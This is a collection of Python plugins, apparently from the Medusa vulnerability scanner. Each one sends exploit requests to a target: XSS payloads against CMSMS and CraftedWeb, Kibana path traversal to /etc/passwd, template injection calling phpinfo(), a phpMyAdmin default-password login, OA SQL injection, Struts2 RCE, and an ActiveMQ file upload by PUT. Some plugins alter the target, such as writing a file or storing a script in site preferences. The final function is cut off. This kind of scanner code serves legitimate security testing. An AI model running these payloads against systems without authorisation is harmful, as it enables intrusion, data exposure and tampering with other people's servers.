def medusa(Url,RandomAgent,proxies=None,**kwargs):
    """Check one target for the 泛微 (Weaver) arbitrary file download issue.

    Sends one GET to ``scheme://host:port`` followed by the module-level
    ``payload`` and records a finding when the response is HTTP 200 and the
    body matches ``No error in <b>...</b>``.

    Args:
        Url: Target URL; split into scheme, host and port by UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        proxies: Proxy setting, passed through ClassCongregation.Proxies.
        **kwargs: Forwarded unchanged to ClassCongregation.VulnerabilityDetails.

    Returns:
        None. Findings and errors are written through ClassCongregation.
    """
    proxies = ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    # Only fill in a port when the URL did not carry one.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload_url = "".join((scheme, "://", url, ':', str(port), payload))
        request_headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'User-Agent': RandomAgent,
        }
        # verify=False: the server certificate is not validated for this probe.
        resp = requests.get(payload_url, headers=request_headers, proxies=proxies, timeout=5, verify=False)
        body = resp.text
        # NOTE(review): the finding rests on a single body pattern; confirm hits manually.
        if resp.status_code == 200 and re.search(r'No error in <b>([^<]+)</b>', body):
            report = "{}存在泛微任意文件下载漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format(url, payload_url)
            finding = VulnerabilityInfo(report)
            # Pass in the url and the scanned data.
            ClassCongregation.VulnerabilityDetails(finding.info, url, **kwargs).Write()
            # Write to file: url is the target file name, report is the result.
            ClassCongregation.WriteFile().result(str(url), str(report))
    except Exception as exc:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(exc, plugin_name)
        # Call the error-log writer.
        ClassCongregation.ErrorLog().Write("Plugin Name:" + plugin_name + " || Target Url:" + url, exc)
예제 #2
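def medusa(Url,RandomAgent,proxies=None,**kwargs):
    """Check one target for the CMSMS stored cross-site scripting issue.

    POSTs a site-preferences form to ``/cmsms2.2.7/admin/siteprefs.php``
    whose ``metadata`` field wraps a marker from
    ``ClassCongregation.randoms().result(20)`` in a script tag, and records a
    finding when the response is HTTP 200 and its body contains the marker.

    Args:
        Url: Target URL; split by ClassCongregation.UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        proxies: Proxy setting, passed through ClassCongregation.Proxies.
        **kwargs: Forwarded unchanged to ClassCongregation.VulnerabilityDetails.

    Returns:
        None. Findings and errors are written through ClassCongregation.
    """
    proxies=ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    # Only fill in a port when the URL did not carry one.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        RD=ClassCongregation.randoms().result(20)
        payload = "/cmsms2.2.7/admin/siteprefs.php"
        # The marker has to be substituted into the form body: without it the
        # literal "{}" is sent and the marker test below can never match.
        # NOTE(review): editsiteprefs=true looks state-changing, so an accepted
        # request would leave the marker in the site's preferences -- confirm
        # and restore the field after testing.
        data = '''__c=3da8342831010e889e2&active_tab=general&editsiteprefs=true&submit=Submit&sitename=lnyas's+cmsms&frontendlang=&frontendwysiwyg=-1&metadata=<script>alert("{}")</script>&logintheme=OneEleven&defaultdateformat=1&thumbnail_width=96&thumbnail_height=96&search_module=Search'''.format(RD)
        payload_url = scheme + "://" + url +":"+ str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",

        }
        # verify=False: the server certificate is not validated for this probe.
        resp = requests.post(payload_url, data=data,headers=headers, proxies=proxies,timeout=6,  verify=False)
        con = resp.text
        code = resp.status_code
        # NOTE(review): a marker-only match also succeeds when the value is
        # echoed HTML-escaped; confirm hits manually.
        if code == 200 and RD in con:
            Medusa = "{}存在CMSMS存储型跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
            _t=VulnerabilityInfo(Medusa)
            # Pass in the url and the scanned data.
            ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write()
            # Write to file: url is the target file name, Medusa is the result.
            ClassCongregation.WriteFile().result(str(url),str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # Call the error-log writer.
        ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)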
def medusa(Url,RandomAgent,Token,proxies=None):
    """Check one target for the CMSMS installer cross-site scripting issue.

    POSTs a ``default_cms_lang`` value containing a URL-encoded
    ``<body/onload=alert(marker)>`` fragment to the installer page and
    records a finding when the response is HTTP 200 and its body contains
    the marker from ``ClassCongregation.randoms().result(20)``.

    Args:
        Url: Target URL; split by ClassCongregation.UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        Token: Passed to ClassCongregation.VulnerabilityDetails with a finding.
        proxies: Proxy setting, passed through ClassCongregation.Proxies.

    Returns:
        None. Findings and errors are written through ClassCongregation.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    # Only fill in a port when the URL did not carry one.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        marker = ClassCongregation.randoms().result(20)
        path = "/k/cms/cmsmadesimple/install/index.php?sessiontest=1"
        form_body = '''default_cms_lang='%3e"%3e%3cbody%2fonload%3dalert({})%3e&submit=Submit'''.format(marker)
        payload_url = "".join((scheme, "://", url, ":", str(port), path))
        request_headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        # verify=False: the server certificate is not validated for this probe.
        resp = requests.post(payload_url, data=form_body, headers=request_headers, proxies=proxies, timeout=6, verify=False)
        body = resp.text
        # NOTE(review): a marker-only match also succeeds when the value is
        # echoed HTML-escaped; confirm hits manually.
        if resp.status_code == 200 and marker in body:
            report = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url, payload_url, body)
            finding = VulnerabilityInfo(report)
            # Pass in the url and the scanned data.
            ClassCongregation.VulnerabilityDetails(finding.info, url, Token).Write()
            # Write to file: url is the target file name, report is the result.
            ClassCongregation.WriteFile().result(str(url), str(report))
    except Exception as exc:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(exc, plugin_name)
        # Call the error-log writer with the URL and the failing plugin's name.
        ClassCongregation.ErrorLog().Write(url, plugin_name)
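def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
    """Check one target for the phpStudy phpMyAdmin default-password issue.

    POSTs the module-level ``post_data`` to ``scheme://host:port`` followed by
    the module-level ``payload``, then GETs the same URL on the same session.
    A finding is recorded when the POST body contains ``frame_navigation``
    and the GET body contains ``navigation.php`` (both case-insensitive).

    Args:
        Url: Target URL; split into scheme, host and port by UrlProcessing.
        Headers: Base request headers supplied by the caller; not modified.
        proxies: Proxy setting, passed through ClassCongregation.Proxies.
        **kwargs: Forwarded unchanged to ClassCongregation.VulnerabilityDetails.

    Returns:
        None. Findings and errors are written through ClassCongregation.
    """
    proxies=ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    # Only fill in a port when the URL did not carry one.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload_url = scheme+"://"+url+ ':' + str(port)+payload

        # Work on a copy so this plugin's headers do not leak into whatever
        # else the caller does with the same dict.
        req_headers = dict(Headers)
        req_headers['Accept']='*/*'
        req_headers["Content-Type"]="application/x-www-form-urlencoded"

        # The context manager closes the session's connections on exit.
        # verify=False: the server certificate is not validated for this probe.
        with requests.session() as s:
            resp = s.post(payload_url, data=post_data,headers=req_headers,proxies=proxies, timeout=5, verify=False)
            resp2 = s.get(payload_url, headers=req_headers, timeout=5, proxies=proxies,verify=False)
        con = resp.text
        con2 = resp2.text
        if 'navigation.php' in con2.lower() and 'frame_navigation' in con.lower():
            # NOTE(review): the report text includes post_data, i.e. the
            # credentials that were accepted; treat the output as sensitive.
            Medusa = "{}存在phpstudy_phpmyadmin默认密码漏洞 \r\n漏洞详情:\r\nPayload:{}\r\nPost:{}\r\n".format(url, payload_url,post_data)
            _t = VulnerabilityInfo(Medusa)
            # Pass in the url and the scanned data.
            ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write()
            # Write to file: url is the target file name, Medusa is the result.
            ClassCongregation.WriteFile().result(str(url),str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # Call the error-log writer.
        ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)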
def medusa(Url,RandomAgent,proxies=None,**kwargs):
    """Check one target for the 璐华 OA SQL injection issue.

    Requests every entry of the module-level ``payloads`` list in turn and
    records a finding for each response whose body contains the hex string
    ``81dc9bdb52d04dc20036dbd8313ed055`` (the MD5 digest of ``1234``).

    Args:
        Url: Target URL; split into scheme, host and port by UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        proxies: Proxy setting, passed through ClassCongregation.Proxies.
        **kwargs: Forwarded unchanged to ClassCongregation.VulnerabilityDetails.

    Returns:
        None. Findings and errors are written through ClassCongregation.
    """
    proxies = ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    # Only fill in a port when the URL did not carry one.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        # One try block covers the whole loop, so the first request that
        # raises also skips the remaining payloads.
        for payload in payloads:
            payload_url = "".join((scheme, "://", url, ':', str(port), payload))
            request_headers = {
                'Accept-Encoding': 'gzip, deflate',
                'Accept': '*/*',
                'User-Agent': RandomAgent,
            }
            # verify=False: the server certificate is not validated for this probe.
            resp = requests.get(payload_url, headers=request_headers, proxies=proxies, timeout=5, verify=False)
            body = resp.text
            # The status code is not part of the decision; only the digest is.
            if '81dc9bdb52d04dc20036dbd8313ed055' in body.lower():
                report = "{}存在璐华OA_SQL注入 \r\n漏洞详情:\r\nPayload:{}\r\n".format(url, payload_url)
                # Write to file: url is the target file name, report is the result.
                ClassCongregation.WriteFile().result(str(url), str(report))
                finding = VulnerabilityInfo(report)
                # Pass in the url and the scanned data.
                ClassCongregation.VulnerabilityDetails(finding.info, url, **kwargs).Write()
    except Exception as exc:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(exc, plugin_name)
        # Call the error-log writer.
        ClassCongregation.ErrorLog().Write("Plugin Name:" + plugin_name + " || Target Url:" + url, exc)
예제 #6
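def medusa(Url,RandomAgent,Token,proxies=None):
    """Check one target for the 五车 library system unauthorised-access issue.

    GETs ``/5clib/property.action`` and records a finding when the response
    is HTTP 200 and its body contains both ``DEFAULT_PDF_LIB_PATH`` and
    ``DEFAULT_SQL_BACKUP_PATH``.

    Args:
        Url: Target URL; split into scheme, host and port by UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        Token: Passed to ClassCongregation.VulnerabilityDetails with a finding.
        proxies: Proxy setting, passed through ClassCongregation.Proxies.

    Returns:
        None. Findings and errors are written through ClassCongregation.
    """
    proxies=ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    # Only fill in a port when the URL did not carry one.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "/5clib/property.action"

        payload_url = scheme + "://" + url +":"+ str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }

        # The context manager closes the session's connections on exit.
        # verify=False: the server certificate is not validated for this probe.
        with requests.session() as s:
            resp = s.get(payload_url, headers=headers, timeout=6,proxies=proxies,  verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and 'DEFAULT_PDF_LIB_PATH' in con and 'DEFAULT_SQL_BACKUP_PATH' in con:
            # NOTE(review): the whole response body goes into the report, so
            # the output holds whatever configuration the page exposed.
            Medusa = "{}存在五车图书管理系统存在越权漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
            _t=VulnerabilityInfo(Medusa)
            # Pass in the url and the scanned data.
            ClassCongregation.VulnerabilityDetails(_t.info, url,Token).Write()
            # Write to file: url is the target file name, Medusa is the result.
            ClassCongregation.WriteFile().result(str(url),str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # Call the error-log writer with the URL and the failing plugin's name.
        ClassCongregation.ErrorLog().Write(url, _)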
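def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
    """Check one target for a template-injection code execution issue in ``/search.php``.

    POSTs a form whose ``order`` field carries a URL-encoded template
    expression that calls ``phpinfo()``, and records a finding when the
    response is HTTP 500 and its body contains the strings ``System``,
    ``Compiler``, ``Build Date``, ``IPv6 Support`` and ``Configure Command``.

    Args:
        Url: Target URL; split into scheme, host and port by UrlProcessing.
        Headers: Base request headers supplied by the caller; not modified.
        proxies: Proxy setting, passed through ClassCongregation.Proxies.
        **kwargs: Forwarded unchanged to ClassCongregation.VulnerabilityDetails.

    Returns:
        None. Findings and errors are written through ClassCongregation.
    """
    proxies=ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    # Only fill in a port when the URL did not carry one.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "/search.php"
        payload_url = scheme + "://" + url +":"+ str(port) + payload
        payload_data = "searchtype=5&order=%7D%7Bend+if%7D+%7Bif%3A1%29phpinfo%28%29%3Bif%281%7D%7Bend+if%7D"

        # Work on a copy so Origin/Referer/Content-Type set here do not leak
        # into whatever else the caller does with the same dict.
        req_headers = dict(Headers)
        req_headers['Accept']='*/*'
        req_headers['Content-Type']='application/x-www-form-urlencoded'
        req_headers['Origin']=scheme+'://'+url
        req_headers['Referer']=payload

        # verify=False: the server certificate is not validated for this probe.
        resp = requests.post(payload_url, headers=req_headers, data=payload_data,proxies=proxies,timeout=5, verify=False)
        con=resp.text
        code = resp.status_code
        phpinfo_markers = ('System', 'Compiler', 'Build Date', 'IPv6 Support', 'Configure Command')
        if code == 500 and all(marker in con for marker in phpinfo_markers):
            # NOTE(review): the report embeds the full phpinfo() output as a
            # bytes repr; treat the output file as sensitive.
            Medusa = "{} 存在远程命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format(url,payload_url,con.encode(encoding='utf-8'))
            _t=VulnerabilityInfo(Medusa)
            # Pass in the url and the scanned data.
            ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write()
            # Write to file: url is the target file name, Medusa is the result.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # Call the error-log writer.
        ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)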
예제 #8
파일: S2_057.py 프로젝트: Echocipher/Medusa
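def medusa(Url,RandomAgent,proxies=None,**kwargs):
    """Check one target for the Struts2 remote code execution issue (file S2_057.py).

    GETs ``scheme://host:port`` followed by the module-level ``payload``
    without following redirects, and records a finding when the response is
    HTTP 302 and its ``Location`` header contains ``54289``.

    Args:
        Url: Target URL; split into scheme, host and port by UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        proxies: Proxy setting, passed through ClassCongregation.Proxies.
        **kwargs: Forwarded unchanged to ClassCongregation.VulnerabilityDetails.

    Returns:
        None. Findings and errors are written through ClassCongregation.
    """
    proxies=ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    # Only fill in a port when the URL did not carry one.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    payload_url = scheme+"://"+url+':'+str(port)+payload
    host=url+':'+str(port)
    headers = {
        'Host':host,
        'Accept-Encoding': 'gzip, deflate',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'User-Agent': RandomAgent,
        'Connection': 'close',
        'DNT': '1',
        'Upgrade-Insecure-Requests': '1'
    }

    try:
        # Redirects are not followed because the evidence is the Location
        # header itself. Unlike sibling plugins this request keeps
        # certificate verification at the requests default.
        resp = requests.get(payload_url,headers=headers, proxies=proxies,timeout=5,allow_redirects=False)
        # A response without a Location header simply means "no finding";
        # indexing the header would raise KeyError and log every such
        # target as a plugin error.
        con = resp.headers.get('Location', '')
        code = resp.status_code
        # NOTE(review): presumably 54289 is the value the payload expression
        # evaluates to -- confirm against the module-level payload.
        if code == 302 and '54289' in con.lower():
            Medusa = "{} 存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n影响版本:版本低于<=Struts2_3_34,Struts2_5_16\r\nPayload:{}\r\n".format(url, payload_url)
            _t = VulnerabilityInfo(Medusa)
            # Pass in the url and the scanned data.
            ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write()
            # Write to file: url is the target file name, Medusa is the result.
            ClassCongregation.WriteFile().result(str(url),str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # Call the error-log writer.
        ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)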
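def medusa(Url,RandomAgent,proxies=None,**kwargs):
    """Check one target for the CraftedWeb reflected cross-site scripting issue.

    GETs ``/aasp_includes/pages/notice.php`` with an ``e`` parameter that
    carries an ``<img ... onerror=alert('marker')>`` fragment, and records a
    finding when the response is HTTP 200 and its body contains that same
    fragment unescaped.

    Args:
        Url: Target URL; split by ClassCongregation.UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        proxies: Proxy setting, passed through ClassCongregation.Proxies.
        **kwargs: Forwarded unchanged to ClassCongregation.VulnerabilityDetails.

    Returns:
        None. Findings and errors are written through ClassCongregation.
    """
    proxies=ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    # Only fill in a port when the URL did not carry one.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        RD=ClassCongregation.randoms().result(20)
        # Keep the injected fragment in one place so the request and the
        # response test cannot drift apart. The previous test looked for
        # "<script>alert(marker)</script>", which this request never sends.
        injected = "<img src=x onerror=alert('{}')>".format(RD)
        payload = "/aasp_includes/pages/notice.php?e=1" + injected
        payload_url = scheme + "://" + url +":"+ str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }

        # verify=False: the server certificate is not validated for this probe.
        resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False)
        con = resp.text
        code = resp.status_code
        # Matching the whole unescaped fragment (not just the marker) keeps
        # HTML-escaped echoes from counting as a finding.
        if code == 200 and injected in con:
            Medusa = "{}存在CraftedWeb跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
            _t=VulnerabilityInfo(Medusa)
            # Pass in the url and the scanned data.
            ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write()
            # Write to file: url is the target file name, Medusa is the result.
            ClassCongregation.WriteFile().result(str(url),str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # Call the error-log writer.
        ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)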
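def medusa(Url,RandomAgent,proxies=None,**kwargs):
    """Check one target for the Kibana file inclusion issue reported as CVE-2018-17246.

    GETs ``/api/console/api_server`` with a path-traversal ``apis`` value and
    records a finding when the response is HTTP 500, its body contains the
    generic Kibana internal-error JSON, and the ``kbn-name`` response header
    equals ``kibana``.

    Args:
        Url: Target URL; split into scheme, host and port by UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        proxies: Proxy setting, passed through ClassCongregation.Proxies.
        **kwargs: Forwarded unchanged to ClassCongregation.VulnerabilityDetails.

    Returns:
        None. Findings and errors are written through ClassCongregation.
    """
    proxies=ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    # Only fill in a port when the URL did not carry one.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload_url = scheme+'://'+url+':'+str(port)+'/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd'
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'Accept-Language': 'en',
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
        }

        # verify=False: the server certificate is not validated for this probe.
        resp = requests.get(payload_url, headers=headers,timeout=5, proxies=proxies,verify=False)
        con=resp.text
        con_hader=resp.headers
        code = resp.status_code
        # NOTE(review): the evidence is an error response, not file content,
        # so a hit shows the endpoint failed on the input rather than that a
        # file was read -- confirm against the installed Kibana version.
        # .get() keeps a missing kbn-name header from raising KeyError and
        # being logged as a plugin error.
        if code == 500 and '{"statusCode":500,"error":"Internal Server Error","message":"An internal server error occurred"}' in con and con_hader.get('kbn-name') == "kibana":
            Medusa = "{} 存在Kibana任意文件读取漏洞(CVE-2018-17246)\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format(url,payload_url,con.encode(encoding='utf-8'))
            _t=VulnerabilityInfo(Medusa)
            # Pass in the url and the scanned data.
            ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write()
            # Write to file: url is the target file name, Medusa is the result.
            ClassCongregation.WriteFile().result(str(url),str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # Call the error-log writer.
        ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)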


#medusa('http://192.168.0.146','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/4')
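def medusa(Url,RandomAgent,Token,proxies=None):
    """Check one target for the ActiveMQ fileserver write issue reported as CVE-2016-3088.

    PUTs the text ``Ascotbe@Medusa`` to ``/fileserver/Medusa.txt`` and reads
    the same URL back. A finding is recorded when the PUT returns HTTP 204
    and the read-back body contains the text (case-insensitive).

    Args:
        Url: Target URL; split into scheme, host and port by UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        Token: Passed to ClassCongregation.VulnerabilityDetails with a finding.
        proxies: Proxy setting, passed through ClassCongregation.Proxies.

    Returns:
        None. Findings and errors are written through ClassCongregation.
    """
    proxies=ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    # Only fill in a port when the URL did not carry one.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        PayloadPoc = "/fileserver/Medusa.txt"
        PayloadUrl = scheme + '://' + url + ':' + str(port)+PayloadPoc
        PayloadCode = 'Ascotbe@Medusa'

        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
            'User-Agent': RandomAgent,
            'Connection': 'close',
        }
        # The context manager closes the session's connections on exit.
        with requests.session() as s:
            # NOTE(review): this check writes a file on the target and never
            # removes it; record the path so it can be cleaned up afterwards.
            resp = s.put(PayloadUrl, data=PayloadCode, headers=headers, proxies=proxies,timeout=3,verify=False)
            code = resp.status_code
            # NOTE(review): the read-back uses the session's default
            # certificate verification while the PUT disables it; on a host
            # with an untrusted certificate the PUT can succeed and this call
            # raise, leaving the file written but unreported.
            resp2=s.get(PayloadUrl, headers=headers,proxies=proxies, timeout=3).text
        if code == 204 and 'ascotbe@medusa' in resp2.lower():
            Medusa = "{} 存在ActiveMQ任意文件写入漏洞(CVE-2016-3088)\r\n漏洞详情:\r\nPayload:{}\r\nPUT内容:{}\r\n".format(url, PayloadUrl,PayloadCode)
            _t = VulnerabilityInfo(Medusa)
            # Pass in the url and the scanned data.
            ClassCongregation.VulnerabilityDetails(_t.info, url,Token).Write()
            # Write to file: url is the target file name, Medusa is the result.
            ClassCongregation.WriteFile().result(str(url),str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # Call the error-log writer.
        ClassCongregation.ErrorLog().Write(url,_)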
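def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
    """Check one target for the CMSMS stored cross-site scripting issue.

    POSTs a site-preferences form to ``/cmsms2.2.7/admin/siteprefs.php``
    whose ``metadata`` field wraps a marker from
    ``ClassCongregation.randoms().result(20)`` in a script tag, and records a
    finding when the response is HTTP 200 and its body contains the marker.

    Args:
        Url: Target URL; split by ClassCongregation.UrlProcessing.
        Headers: Request headers supplied by the caller; sent as given.
        proxies: Proxy setting, passed through ClassCongregation.Proxies.
        **kwargs: Forwarded unchanged to ClassCongregation.VulnerabilityDetails.

    Returns:
        None. Findings and errors are written through ClassCongregation.
    """
    proxies=ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    # Only fill in a port when the URL did not carry one.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        RD=ClassCongregation.randoms().result(20)
        payload = "/cmsms2.2.7/admin/siteprefs.php"
        # The marker has to be substituted into the form body: without it the
        # literal "{}" is sent and the marker test below can never match.
        # NOTE(review): editsiteprefs=true looks state-changing, so an accepted
        # request would leave the marker in the site's preferences -- confirm
        # and restore the field after testing.
        data = '''__c=3da8342831010e889e2&active_tab=general&editsiteprefs=true&submit=Submit&sitename=lnyas's+cmsms&frontendlang=&frontendwysiwyg=-1&metadata=<script>alert("{}")</script>&logintheme=OneEleven&defaultdateformat=1&thumbnail_width=96&thumbnail_height=96&search_module=Search'''.format(RD)
        payload_url = scheme + "://" + url +":"+ str(port) + payload

        # verify=False: the server certificate is not validated for this probe.
        resp = requests.post(payload_url, data=data,headers=Headers, proxies=proxies,timeout=6,  verify=False)
        con = resp.text
        code = resp.status_code
        # NOTE(review): a marker-only match also succeeds when the value is
        # echoed HTML-escaped; confirm hits manually.
        if code == 200 and RD in con:
            Medusa = "{}存在CMSMS存储型跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
            _t=VulnerabilityInfo(Medusa)
            # Pass in the url and the scanned data.
            ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write()
            # Write to file: url is the target file name, Medusa is the result.
            ClassCongregation.WriteFile().result(str(url),str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # Call the error-log writer.
        ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)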
예제 #13
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    """Check one target for the CMSMS reflected cross-site scripting issue.

    GETs the ModuleManager ``moduledepends`` action with a script tag
    appended to ``m1_version`` and records a finding when the response is
    HTTP 200 and its body contains the fixed marker ``cscanhyhm2n``.

    Args:
        Url: Target URL; split by ClassCongregation.UrlProcessing.
        Headers: Request headers supplied by the caller; sent as given.
        proxies: Proxy setting, passed through ClassCongregation.Proxies.
        **kwargs: Forwarded unchanged to ClassCongregation.VulnerabilityDetails.

    Returns:
        None. Findings and errors are written through ClassCongregation.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    # Only fill in a port when the URL did not carry one.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        path = "/cmsms2.2.7/admin/moduleinterface.php?mact=ModuleManager,m1_,moduledepends,0&__c=3da8342831010e889e2&m1_name=Adherents&m1_version=0.2.6<script>alert(cscanhyhm2n)</script>&m1_filename=Adherents-0.2.6.xml"
        payload_url = "".join((scheme, "://", url, ":", str(port), path))

        # verify=False: the server certificate is not validated for this probe.
        resp = requests.get(payload_url, headers=Headers, timeout=6, proxies=proxies, verify=False)
        body = resp.text
        # NOTE(review): a marker-only match also succeeds when the value is
        # echoed HTML-escaped; confirm hits manually.
        if resp.status_code == 200 and 'cscanhyhm2n' in body:
            report = "{}存在CMSMS反射型跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url, payload_url, body)
            finding = VulnerabilityInfo(report)
            # Pass in the url and the scanned data.
            ClassCongregation.VulnerabilityDetails(finding.info, url, **kwargs).Write()
            # Write to file: url is the target file name, report is the result.
